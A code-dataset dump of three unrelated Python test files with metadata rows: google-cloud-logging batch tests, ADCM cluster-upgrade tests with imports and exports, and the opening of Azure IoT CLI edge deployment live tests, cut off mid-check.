        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
        from google.cloud.logging import ProtobufEntry
        from google.protobuf.struct_pb2 import Struct
        from google.protobuf.struct_pb2 import Value

        message = Struct(fields={"foo": Value(bool_value=True)})
        ENTRY = ProtobufEntry(payload=message, resource=_GLOBAL_RESOURCE)
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_proto(message)
        self.assertEqual(batch.entries, [ENTRY])

    def test_log_proto_explicit(self):
        # log_proto() with all metadata queues an equivalent ProtobufEntry.
        import datetime

        from google.cloud.logging import Resource
        from google.cloud.logging import ProtobufEntry
        from google.protobuf.struct_pb2 import Struct
        from google.protobuf.struct_pb2 import Value

        message = Struct(fields={"foo": Value(bool_value=True)})
        LABELS = {"foo": "bar", "baz": "qux"}
        IID = "IID"
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        TRACE = "12345678-1234-5678-1234-567812345678"
        SPANID = "000000000000004a"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
        RESOURCE = Resource(
            type="gae_app", labels={"module_id": "default", "version_id": "test"}
        )
        ENTRY = ProtobufEntry(
            payload=message,
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_proto(
            message,
            labels=LABELS,
            insert_id=IID,
            severity=SEVERITY,
            http_request=REQUEST,
            timestamp=TIMESTAMP,
            resource=RESOURCE,
            trace=TRACE,
            span_id=SPANID,
            trace_sampled=True,
        )
        self.assertEqual(batch.entries, [ENTRY])

    def test_commit_w_unknown_entry_type(self):
        # A base LogEntry (no payload) still serializes and commits cleanly.
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
        from google.cloud.logging import LogEntry

        logger = _Logger()
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        api = client.logging_api = _DummyLoggingAPI()
        batch = self._make_one(logger, client)
        batch.entries.append(LogEntry(severity="blah"))
        ENTRY = {"severity": "blah", "resource": _GLOBAL_RESOURCE._to_dict()}
        batch.commit()
        # commit() drains the queue and forwards the serialized entries.
        self.assertEqual(list(batch.entries), [])
        self.assertEqual(
            api._write_entries_called_with, ([ENTRY], logger.full_name, None, None)
        )

    def test_commit_w_resource_specified(self):
        # A batch-level resource is sent once at write time; per-entry
        # resources (or explicit None) override/omit it per entry.
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE
        from google.cloud.logging import Resource

        logger = _Logger()
        client = _Client(project=self.PROJECT, connection=_make_credentials())
        api = client.logging_api = _DummyLoggingAPI()
        RESOURCE = Resource(
            type="gae_app", labels={"module_id": "default", "version_id": "test"}
        )
        batch = self._make_one(logger, client, resource=RESOURCE)
        MESSAGE = "This is the entry text"
        ENTRIES = [
            {"textPayload": MESSAGE},
            {"textPayload": MESSAGE, "resource": _GLOBAL_RESOURCE._to_dict()},
        ]
        batch.log_text(MESSAGE, resource=None)
        batch.log_text(MESSAGE)
        batch.commit()
        self.assertEqual(
            api._write_entries_called_with,
            (ENTRIES, logger.full_name, RESOURCE._to_dict(), None),
        )

    def test_commit_w_bound_client(self):
        # Mixed text/struct/proto entries commit through the bound client,
        # each with its own insert_id, RFC3339 timestamp and trace metadata.
        import json
        import datetime

        from google.protobuf.json_format import MessageToJson
        from google.protobuf.struct_pb2 import Struct
        from google.protobuf.struct_pb2 import Value
        from google.cloud._helpers import _datetime_to_rfc3339
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE

        TEXT = "This is the entry text"
        STRUCT = {"message": TEXT, "weather": "partly cloudy"}
        message = Struct(fields={"foo": Value(bool_value=True)})
        IID1 = "IID1"
        IID2 = "IID2"
        IID3 = "IID3"
        TIMESTAMP1 = datetime.datetime(2016, 12, 31, 0, 0, 1, 999999)
        TIMESTAMP2 = datetime.datetime(2016, 12, 31, 0, 0, 2, 999999)
        TIMESTAMP3 = datetime.datetime(2016, 12, 31, 0, 0, 3, 999999)
        TRACE1 = "12345678-1234-5678-1234-567812345678"
        TRACE2 = "12345678-1234-5678-1234-567812345679"
        TRACE3 = "12345678-1234-5678-1234-567812345670"
        SPANID1 = "000000000000004a"
        SPANID2 = "000000000000004b"
        SPANID3 = "000000000000004c"
        ENTRIES = [
            {
                "textPayload": TEXT,
                "insertId": IID1,
                "timestamp": _datetime_to_rfc3339(TIMESTAMP1),
                "resource": _GLOBAL_RESOURCE._to_dict(),
                "trace": TRACE1,
                "spanId": SPANID1,
                "traceSampled": True,
            },
            {
                "jsonPayload": STRUCT,
                "insertId": IID2,
                "timestamp": _datetime_to_rfc3339(TIMESTAMP2),
                "resource": _GLOBAL_RESOURCE._to_dict(),
                "trace": TRACE2,
                "spanId": SPANID2,
                "traceSampled": False,
            },
            {
                "protoPayload": json.loads(MessageToJson(message)),
                "insertId": IID3,
                "timestamp": _datetime_to_rfc3339(TIMESTAMP3),
                "resource": _GLOBAL_RESOURCE._to_dict(),
                "trace": TRACE3,
                "spanId": SPANID3,
                "traceSampled": True,
            },
        ]
        client = _Client(project=self.PROJECT)
        api = client.logging_api = _DummyLoggingAPI()
        logger = _Logger()
        batch = self._make_one(logger, client=client)
        batch.log_text(
            TEXT,
            insert_id=IID1,
            timestamp=TIMESTAMP1,
            trace=TRACE1,
            span_id=SPANID1,
            trace_sampled=True,
        )
        batch.log_struct(
            STRUCT,
            insert_id=IID2,
            timestamp=TIMESTAMP2,
            trace=TRACE2,
            span_id=SPANID2,
            trace_sampled=False,
        )
        batch.log_proto(
            message,
            insert_id=IID3,
            timestamp=TIMESTAMP3,
            trace=TRACE3,
            span_id=SPANID3,
            trace_sampled=True,
        )
        batch.commit()
        self.assertEqual(list(batch.entries), [])
        self.assertEqual(
            api._write_entries_called_with, (ENTRIES, logger.full_name, None, None)
        )

    def test_commit_w_alternate_client(self):
        # commit(client=...) writes through the override client and forwards
        # the logger's default labels at the batch level.
        import json

        from google.protobuf.json_format import MessageToJson
        from google.protobuf.struct_pb2 import Struct
        from google.protobuf.struct_pb2 import Value
        from google.cloud.logging import Logger
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE

        TEXT = "This is the entry text"
        STRUCT = {"message": TEXT, "weather": "partly cloudy"}
        message = Struct(fields={"foo": Value(bool_value=True)})
        DEFAULT_LABELS = {"foo": "spam"}
        LABELS = {"foo": "bar", "baz": "qux"}
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        client1 = _Client(project=self.PROJECT)
        client2 = _Client(project=self.PROJECT)
        api = client2.logging_api = _DummyLoggingAPI()
        logger = Logger("logger_name", client1, labels=DEFAULT_LABELS)
        ENTRIES = [
            {
                "textPayload": TEXT,
                "labels": LABELS,
                "resource": _GLOBAL_RESOURCE._to_dict(),
            },
            {
                "jsonPayload": STRUCT,
                "severity": SEVERITY,
                "resource": _GLOBAL_RESOURCE._to_dict(),
            },
            {
                "protoPayload": json.loads(MessageToJson(message)),
                "httpRequest": REQUEST,
                "resource": _GLOBAL_RESOURCE._to_dict(),
            },
        ]
        batch = self._make_one(logger, client=client1)
        batch.log_text(TEXT, labels=LABELS)
        batch.log_struct(STRUCT, severity=SEVERITY)
        batch.log_proto(message, http_request=REQUEST)
        batch.commit(client=client2)
        self.assertEqual(list(batch.entries), [])
        self.assertEqual(
            api._write_entries_called_with,
            (ENTRIES, logger.full_name, None, DEFAULT_LABELS),
        )

    def test_context_mgr_success(self):
        # Leaving the `with` block normally commits the queued entries.
        import json

        from google.protobuf.json_format import MessageToJson
        from google.protobuf.struct_pb2 import Struct
        from google.protobuf.struct_pb2 import Value
        from google.cloud.logging import Logger
        from google.cloud.logging_v2.entries import _GLOBAL_RESOURCE

        TEXT = "This is the entry text"
        STRUCT = {"message": TEXT, "weather": "partly cloudy"}
        message = Struct(fields={"foo": Value(bool_value=True)})
        DEFAULT_LABELS = {"foo": "spam"}
        LABELS = {"foo": "bar", "baz": "qux"}
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        client = _Client(project=self.PROJECT)
        api = client.logging_api = _DummyLoggingAPI()
        logger = Logger("logger_name", client, labels=DEFAULT_LABELS)
        ENTRIES = [
            {
                "textPayload": TEXT,
                "httpRequest": REQUEST,
                "resource": _GLOBAL_RESOURCE._to_dict(),
            },
            {
                "jsonPayload": STRUCT,
                "labels": LABELS,
                "resource": _GLOBAL_RESOURCE._to_dict(),
            },
            {
                "protoPayload": json.loads(MessageToJson(message)),
                "resource": _GLOBAL_RESOURCE._to_dict(),
                "severity": SEVERITY,
            },
        ]
        batch = self._make_one(logger, client=client)
        with batch as other:
            other.log_text(TEXT, http_request=REQUEST)
            other.log_struct(STRUCT, labels=LABELS)
            other.log_proto(message, severity=SEVERITY)
        self.assertEqual(list(batch.entries), [])
        self.assertEqual(
            api._write_entries_called_with,
            (ENTRIES, logger.full_name, None, DEFAULT_LABELS),
        )

    def test_context_mgr_failure(self):
        # An exception inside the `with` block must suppress the commit:
        # entries stay queued and the API is never called.
        import datetime

        from google.protobuf.struct_pb2 import Struct
        from google.protobuf.struct_pb2 import Value
        from google.cloud.logging import TextEntry
        from google.cloud.logging import StructEntry
        from google.cloud.logging import ProtobufEntry

        TEXT = "This is the entry text"
        STRUCT = {"message": TEXT, "weather": "partly cloudy"}
        LABELS = {"foo": "bar", "baz": "qux"}
        IID = "IID"
        SEVERITY = "CRITICAL"
        METHOD = "POST"
        URI = "https://api.example.com/endpoint"
        STATUS = "500"
        REQUEST = {"requestMethod": METHOD, "requestUrl": URI, "status": STATUS}
        TIMESTAMP = datetime.datetime(2016, 12, 31, 0, 1, 2, 999999)
        message = Struct(fields={"foo": Value(bool_value=True)})
        client = _Client(project=self.PROJECT)
        api = client.logging_api = _DummyLoggingAPI()
        logger = _Logger()
        UNSENT = [
            TextEntry(payload=TEXT, insert_id=IID, timestamp=TIMESTAMP),
            StructEntry(payload=STRUCT, severity=SEVERITY),
            ProtobufEntry(payload=message, labels=LABELS, http_request=REQUEST),
        ]
        batch = self._make_one(logger, client=client)
        try:
            with batch as other:
                other.log_text(TEXT, insert_id=IID, timestamp=TIMESTAMP)
                other.log_struct(STRUCT, severity=SEVERITY)
                other.log_proto(message, labels=LABELS, http_request=REQUEST)
                raise _Bugout()
        except _Bugout:
            pass
        self.assertEqual(list(batch.entries), UNSENT)
        self.assertIsNone(api._write_entries_called_with)
class _Logger(object):
    """Minimal Logger stand-in exposing only ``labels`` and ``full_name``."""

    labels = None

    def __init__(self, name="NAME", project="PROJECT"):
        self.full_name = f"projects/{project}/logs/{name}"
class _DummyLoggingAPI(object):
    """Logging API stub: records call arguments instead of performing I/O."""

    # Tuple of (entries, logger_name, resource, labels) from the last call,
    # or None if write_entries was never invoked.
    _write_entries_called_with = None

    def write_entries(self, entries, *, logger_name=None, resource=None, labels=None):
        self._write_entries_called_with = (entries, logger_name, resource, labels)

    def logger_delete(self, logger_name):
        # Records the deleted logger name for later assertion.
        self._logger_delete_called_with = logger_name
class _Client(object):
    """Minimal client stub exposing only the attributes the tests read."""

    def __init__(self, project, connection=None):
        self.project = project
        self._connection = connection
class _Bugout(Exception):
    """Sentinel exception used to abort a batch context manager in tests."""

    pass
class _Connection(object):
    """Connection stub: replays canned responses and records the last request."""

    # Keyword arguments of the most recent api_request call (None if unused).
    _called_with = None

    def __init__(self, *responses):
        self._responses = responses

    def api_request(self, **kw):
        # Remember the request, then pop and return the next canned response.
        self._called_with = kw
        response = self._responses[0]
        self._responses = self._responses[1:]
        return response
| 35.741379
| 88
| 0.58211
| 4,400
| 43,533
| 5.555227
| 0.068182
| 0.025774
| 0.025161
| 0.036002
| 0.851573
| 0.829726
| 0.791597
| 0.762345
| 0.751381
| 0.733871
| 0
| 0.033321
| 0.307169
| 43,533
| 1,217
| 89
| 35.770748
| 0.777096
| 0.01755
| 0
| 0.710626
| 0
| 0
| 0.113526
| 0.020375
| 0
| 0
| 0
| 0
| 0.060721
| 1
| 0.043643
| false
| 0.001898
| 0.081594
| 0.001898
| 0.144213
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86d42d202892202a4ed4ecc8fb938780083a78bf
| 10,186
|
py
|
Python
|
tests/functional/test_upgrade_cluster_imports.py
|
AKhodus/adcm
|
98dbf22af3f1c6afa94505e9acaff0ac4088a602
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_upgrade_cluster_imports.py
|
AKhodus/adcm
|
98dbf22af3f1c6afa94505e9acaff0ac4088a602
|
[
"Apache-2.0"
] | null | null | null |
tests/functional/test_upgrade_cluster_imports.py
|
AKhodus/adcm
|
98dbf22af3f1c6afa94505e9acaff0ac4088a602
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import allure
import coreapi
import pytest
from adcm_client.objects import ADCMClient
from adcm_pytest_plugin.utils import get_data_dir, parametrize_by_data_subdirs
from tests.library import errorcodes as err
@allure.step('Bind service and cluster')
def bind_service_and_cluster(cluster_import, service, cluster):
    """Bind *service* and then *cluster* (the exporter) to *cluster_import*."""
    cluster_import.bind(service)
    cluster_import.bind(cluster)
def test_upgrade_cluster_with_import(sdk_client_fs: ADCMClient):
    """Scenario:
    1. Create cluster for upgrade with exports
    2. Create upgradable cluster with imports
    3. Bind service and cluster
    4. Upgrade cluster
    5. Check that cluster was upgraded
    """
    with allure.step('Create cluster with exports'):
        bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
        cluster = bundle.cluster_create("test")
        service = cluster.service_add(name="hadoop")
        # Snapshot configs before the upgrade to verify they survive it.
        cluster_config_before = cluster.config()
        service_config_before = service.config()
    with allure.step('Create cluster for upgrade with imports'):
        bundle_import = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgradable_cluster_with_import'))
        cluster_import = bundle_import.cluster_create("cluster_import")
        bind_service_and_cluster(cluster_import, service, cluster)
    with allure.step('Upgrade cluster'):
        upgr = cluster.upgrade(name='upgrade to 1.6')
        upgr.do()
    with allure.step('Check that cluster was upgraded'):
        # reread() refreshes the objects' state from the server post-upgrade.
        cluster.reread()
        service.reread()
        cluster_config_after = cluster.config()
        service_config_after = service.config()
        assert cluster.prototype().version == '1.6'
        assert service.prototype().version == '2.2'
        # Every pre-upgrade config value must be preserved by the upgrade.
        for variable in cluster_config_before:
            assert cluster_config_before[variable] == cluster_config_after[variable]
        for variable in service_config_before:
            assert service_config_before[variable] == service_config_after[variable]
def test_upgrade_cluster_with_export(sdk_client_fs: ADCMClient):
    """Scenario:
    1. Create cluster for upgrade with export
    2. Create cluster for upgrade with import
    3. Load upgradable bundle with import
    4. Bind service and cluster
    5. Upgrade cluster with import
    6. Check that cluster was upgraded
    """
    with allure.step('Create cluster for upgrade with exports'):
        bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'cluster_with_export'))
        cluster = bundle.cluster_create("test")
        service = cluster.service_add(name="hadoop")
    with allure.step('Create cluster for upgrade with imports. Load upgradable bundle with import'):
        bundle_import = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_import'))
        # The upgradable bundle only needs to be present server-side; its
        # return value is not used directly.
        sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgradable_cluster_with_import'))
        cluster_import = bundle_import.cluster_create("cluster_import")
        bind_service_and_cluster(cluster_import, service, cluster)
    with allure.step('Upgrade cluster with import to 1.6'):
        upgr = cluster_import.upgrade(name='upgrade to 1.6')
        # Remember the prototype id so we can assert it changed after upgrade.
        id_before = cluster_import.prototype_id
        upgr.do()
    with allure.step('Check that cluster was upgraded'):
        cluster_import.reread()
        assert cluster_import.prototype().version == '1.6'
        assert cluster_import.prototype_id != id_before
@parametrize_by_data_subdirs(__file__, "upgradable_cluster_with_strict_incorrect_version")
def test_incorrect_import_strict_version(sdk_client_fs: ADCMClient, path):
    """Upgrade must fail on an incorrect strict import version.

    Each parametrized ``path`` is an upgradable bundle whose strict
    import version the bound service does not satisfy; the upgrade of
    the importing cluster is expected to raise UPGRADE_ERROR.
    """
    with allure.step('Create cluster for upgrade with exports for strict test'):
        export_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export_for_strict_test'))
        # Register the parametrized upgradable bundle with the bad strict version.
        sdk_client_fs.upload_from_fs(path)
        export_cluster = export_bundle.cluster_create("test")
        exported_service = export_cluster.service_add(name="hadoop")
    with allure.step('Create upgradable cluster with import'):
        import_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'cluster_with_correct_import'))
        importing_cluster = import_bundle.cluster_create("cluster_import")
        bind_service_and_cluster(importing_cluster, exported_service, export_cluster)
    with allure.step('Upgrade cluster with import with error'):
        upgrade_task = importing_cluster.upgrade(name='upgrade to 1.6')
        with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
            upgrade_task.do()
    with allure.step('Check that cluster was not upgraded'):
        err.UPGRADE_ERROR.equal(e)
@parametrize_by_data_subdirs(__file__, "upgradable_cluster_with_incorrect_version")
def test_incorrect_import_version(sdk_client_fs: ADCMClient, path):
    """Upgrade must fail on an incorrect (non-strict) import version.

    Each parametrized ``path`` is an upgradable bundle that declares an
    import version incompatible with the bound service; the upgrade is
    expected to raise UPGRADE_ERROR.
    """
    with allure.step('Create cluster for upgrade with exports and cluster with correct import'):
        export_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
        # Register the parametrized upgradable bundle with the bad version.
        sdk_client_fs.upload_from_fs(path)
        import_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'cluster_with_correct_import'))
        export_cluster = export_bundle.cluster_create("test")
        exported_service = export_cluster.service_add(name="hadoop")
        importing_cluster = import_bundle.cluster_create("cluster_import")
        bind_service_and_cluster(importing_cluster, exported_service, export_cluster)
    with allure.step('Upgrade cluster with import to 1.6 with error'):
        upgrade_task = importing_cluster.upgrade(name='upgrade to 1.6')
        with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
            upgrade_task.do()
    with allure.step('Check that cluster was not upgraded'):
        err.UPGRADE_ERROR.equal(e)
def test_upgrade_cluster_without_service_config_in_import(sdk_client_fs: ADCMClient):
    """Upgrade must fail when the import lacks service configuration.

    The upgradable importing bundle omits some service configuration
    variables; upgrading the exporting cluster is expected to raise
    UPGRADE_ERROR.
    """
    with allure.step('Create cluster for upgrade with exports and cluster without config in import'):
        export_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
        import_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgradable_cluster_without_service'))
        export_cluster = export_bundle.cluster_create("test")
        exported_service = export_cluster.service_add(name="hadoop")
        importing_cluster = import_bundle.cluster_create("cluster_import")
    with allure.step('Bind service from cluster with export to cluster with import'):
        importing_cluster.bind(exported_service)
        importing_cluster.bind(export_cluster)
    with allure.step('Upgrade cluster with export'):
        upgrade_task = export_cluster.upgrade(name='upgrade to 1.6')
        with pytest.raises(coreapi.exceptions.ErrorMessage) as e:
            upgrade_task.do()
    with allure.step('Check upgrade error'):
        err.UPGRADE_ERROR.equal(e)
def test_upgrade_cluster_with_new_configuration_variables(sdk_client_fs: ADCMClient):
    """Upgrade to a bundle that introduces new configuration variables.

    After the upgrade, the cluster and service must carry the new
    (larger) config sets while every pre-existing variable keeps its
    original value.
    """
    with allure.step('Create cluster for upgrade with exports and cluster with import new config vars'):
        export_bundle = sdk_client_fs.upload_from_fs(get_data_dir(__file__, 'upgrade_cluster_with_export'))
        import_bundle = sdk_client_fs.upload_from_fs(
            get_data_dir(__file__, 'upgradable_cluster_with_import_new_config_vars')
        )
        export_cluster = export_bundle.cluster_create("test")
        exported_service = export_cluster.service_add(name="hadoop")
        cluster_config_before = export_cluster.config()
        service_config_before = exported_service.config()
        importing_cluster = import_bundle.cluster_create("cluster_import")
        bind_service_and_cluster(importing_cluster, exported_service, export_cluster)
    with allure.step('Upgrade cluster with export'):
        upgrade_task = export_cluster.upgrade(name='upgrade to 1.6')
        upgrade_task.do()
    with allure.step('Check upgraded cluster'):
        export_cluster.reread()
        exported_service.reread()
        cluster_config_after = export_cluster.config()
        service_config_after = exported_service.config()
        assert export_cluster.prototype().version == '1.6'
        assert exported_service.prototype().version == '2.2'
        # New variables were added by the upgrade target bundle.
        assert len(cluster_config_after) == 4, cluster_config_after
        assert len(service_config_after) == 3, service_config_after
        # Pre-existing variables must survive the upgrade unchanged.
        for key in cluster_config_before:
            assert cluster_config_before[key] == cluster_config_after[key]
        for key in service_config_before:
            assert service_config_before[key] == service_config_after[key]
| 50.17734
| 116
| 0.737188
| 1,360
| 10,186
| 5.235294
| 0.103676
| 0.078792
| 0.043258
| 0.035815
| 0.823736
| 0.778652
| 0.763483
| 0.736938
| 0.700281
| 0.673876
| 0
| 0.007826
| 0.184567
| 10,186
| 202
| 117
| 50.425743
| 0.849386
| 0.211958
| 0
| 0.638462
| 0
| 0
| 0.212761
| 0.058944
| 0
| 0
| 0
| 0
| 0.092308
| 1
| 0.053846
| false
| 0
| 0.392308
| 0
| 0.446154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8105acec6e4a74a574d9ae4861c977f79f4a2eb4
| 30,709
|
py
|
Python
|
azext_iot/tests/iothub/configurations/test_iot_config_int.py
|
rido-min/azure-iot-cli-extension
|
bb3c5d9ebaa260b9fc186b08ba690813e0ad8932
|
[
"MIT"
] | null | null | null |
azext_iot/tests/iothub/configurations/test_iot_config_int.py
|
rido-min/azure-iot-cli-extension
|
bb3c5d9ebaa260b9fc186b08ba690813e0ad8932
|
[
"MIT"
] | 1
|
2021-04-26T20:31:10.000Z
|
2021-04-26T20:31:10.000Z
|
azext_iot/tests/iothub/configurations/test_iot_config_int.py
|
rido-min/azure-iot-cli-extension
|
bb3c5d9ebaa260b9fc186b08ba690813e0ad8932
|
[
"MIT"
] | null | null | null |
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import random
import json
from azext_iot.tests import IoTLiveScenarioTest
from azext_iot.tests.conftest import get_context_path
from azext_iot.tests.iothub import DATAPLANE_AUTH_TYPES
from azext_iot.tests.settings import DynamoSettings, ENV_SET_TEST_IOTHUB_BASIC
from azext_iot.common.utility import read_file_content
# Live-test target resolved from environment variables.
settings = DynamoSettings(ENV_SET_TEST_IOTHUB_BASIC)
LIVE_HUB = settings.env.azext_iot_testhub  # IoT Hub name under test
LIVE_RG = settings.env.azext_iot_testrg  # resource group containing the hub

# JSON fixtures used as deployment/configuration content in the tests below.
edge_content_path = get_context_path(__file__, "test_edge_deployment.json")
edge_content_layered_path = get_context_path(
    __file__, "test_edge_deployment_layered.json"
)
edge_content_v11_path = get_context_path(__file__, "test_edge_deployment_v11.json")
edge_content_v1_path = get_context_path(__file__, "test_edge_deployment_v1.json")
# Intentionally invalid deployment used to exercise schema validation failures.
edge_content_malformed_path = get_context_path(
    __file__, "test_edge_deployment_malformed.json"
)
generic_metrics_path = get_context_path(__file__, "test_config_generic_metrics.json")
adm_content_module_path = get_context_path(__file__, "test_adm_module_content.json")
adm_content_device_path = get_context_path(__file__, "test_adm_device_content.json")
class TestIoTEdgeSetModules(IoTLiveScenarioTest):
    """Live tests for 'iot edge set-modules' against a real hub."""

    def __init__(self, test_case):
        super(TestIoTEdgeSetModules, self).__init__(
            test_case, LIVE_HUB, LIVE_RG
        )

    def test_edge_set_modules(self):
        """Apply module content inline and from file; malformed content
        must fail schema validation. Repeated per dataplane auth type."""
        for phase in DATAPLANE_AUTH_TYPES:
            device_ids = self.generate_device_names(1, True)

            # Edge-enabled device the modules are applied to.
            self.cmd(
                self.set_cmd_auth_type(
                    "iot hub device-identity create -d {} -n {} -g {} --ee".format(
                        device_ids[0], LIVE_HUB, LIVE_RG
                    ),
                    auth_type=phase,
                )
            )

            self.kwargs["edge_content"] = read_file_content(edge_content_path)

            # Content inline
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge set-modules -d {} -n {} -g {} --content '{}'".format(
                        device_ids[0], LIVE_HUB, LIVE_RG, "{edge_content}"
                    ),
                    auth_type=phase,
                ),
                checks=[self.check("length([*])", 3)],
            )

            # Content from file
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge set-modules -d {} -n {} -g {} -k '{}'".format(
                        device_ids[0], LIVE_HUB, LIVE_RG, edge_content_v1_path
                    ),
                    auth_type=phase,
                ),
                checks=[self.check("length([*])", 4)],
            )

            # Error schema validation - Malformed deployment
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge set-modules -d {} -n {} -g {} -k '{}'".format(
                        device_ids[0], LIVE_HUB, LIVE_RG, edge_content_malformed_path
                    ),
                    auth_type=phase,
                ),
                expect_failure=True,
            )
class TestIoTEdgeDeployments(IoTLiveScenarioTest):
    """Live tests for 'iot edge deployment' CRUD, metric evaluation and
    schema validation against a real hub."""

    def __init__(self, test_case):
        super(TestIoTEdgeDeployments, self).__init__(
            test_case, LIVE_HUB, LIVE_RG
        )

    def test_edge_deployments(self):
        """Create deployments from inline content, files, layered, v1 and
        v1.1 schemas; show, update, evaluate metrics, list and delete.
        Malformed or mis-flagged content must fail validation. The whole
        flow repeats per dataplane auth type.

        Fix: the list check previously asserted length == 5 but only
        verified the existence of config_ids[0..3]; config_ids[4] is now
        checked as well.
        """
        for auth_phase in DATAPLANE_AUTH_TYPES:
            config_count = 5
            config_ids = self.generate_config_names(config_count)

            self.kwargs["generic_metrics"] = read_file_content(generic_metrics_path)
            self.kwargs["edge_content"] = read_file_content(edge_content_path)
            self.kwargs["edge_content_layered"] = read_file_content(
                edge_content_layered_path
            )
            self.kwargs["edge_content_v1"] = read_file_content(edge_content_v1_path)
            self.kwargs["edge_content_malformed"] = read_file_content(
                edge_content_malformed_path
            )
            self.kwargs["labels"] = '{"key0": "value0"}'

            priority = random.randint(1, 10)
            condition = "tags.building=9 and tags.environment='test'"

            # Content inline
            # Note: $schema is included as a nested property in the sample content.
            self.cmd(
                self.set_cmd_auth_type(
                    """iot edge deployment create --deployment-id {} --hub-name {} --resource-group {} --priority {}
                    --target-condition \"{}\" --labels '{}' --content '{}'""".format(
                        config_ids[0],
                        LIVE_HUB,
                        LIVE_RG,
                        priority,
                        condition,
                        "{labels}",
                        "{edge_content}",
                    ),
                    auth_type=auth_phase,
                ),
                checks=[
                    self.check("id", config_ids[0]),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                    self.check(
                        "content.modulesContent",
                        json.loads(self.kwargs["edge_content"])["content"][
                            "modulesContent"
                        ],
                    ),
                    self.check("metrics.queries", {}),
                ],
            )

            # Content + metrics from file. Configurations must be lowercase and will be lower()'ed.
            # Note: $schema is included as a nested property in the sample content.
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment create -d {} --pri {} --tc \"{}\" --lab '{}' -k '{}' --metrics '{}' -n {} -g {}".format(
                        config_ids[1].upper(),
                        priority,
                        condition,
                        "{labels}",
                        edge_content_path,
                        edge_content_path,
                        LIVE_HUB,
                        LIVE_RG
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("id", config_ids[1].lower()),
                    self.check("priority", priority),
                    self.check("targetCondition", condition),
                    self.check("labels", json.loads(self.kwargs["labels"])),
                    self.check(
                        "content.modulesContent",
                        json.loads(self.kwargs["edge_content"])["content"][
                            "modulesContent"
                        ],
                    ),
                    self.check(
                        "metrics.queries",
                        json.loads(self.kwargs["edge_content"])["metrics"]["queries"],
                    ),
                ],
            )

            # Layered deployment with content + metrics from file.
            # No labels, target-condition or priority
            self.cmd(
                self.set_cmd_auth_type(
                    "iot edge deployment create -d {} -k '{}' --metrics '{}' --layered -n {} -g {}".format(
                        config_ids[2].upper(),
                        edge_content_layered_path,
                        generic_metrics_path,
                        LIVE_HUB,
                        LIVE_RG,
                    ),
                    auth_type=auth_phase
                ),
                checks=[
                    self.check("id", config_ids[2].lower()),
                    self.check("priority", 0),
                    self.check("targetCondition", ""),
                    self.check("labels", None),
                    self.check(
                        "content.modulesContent",
                        json.loads(self.kwargs["edge_content_layered"])["content"][
                            "modulesContent"
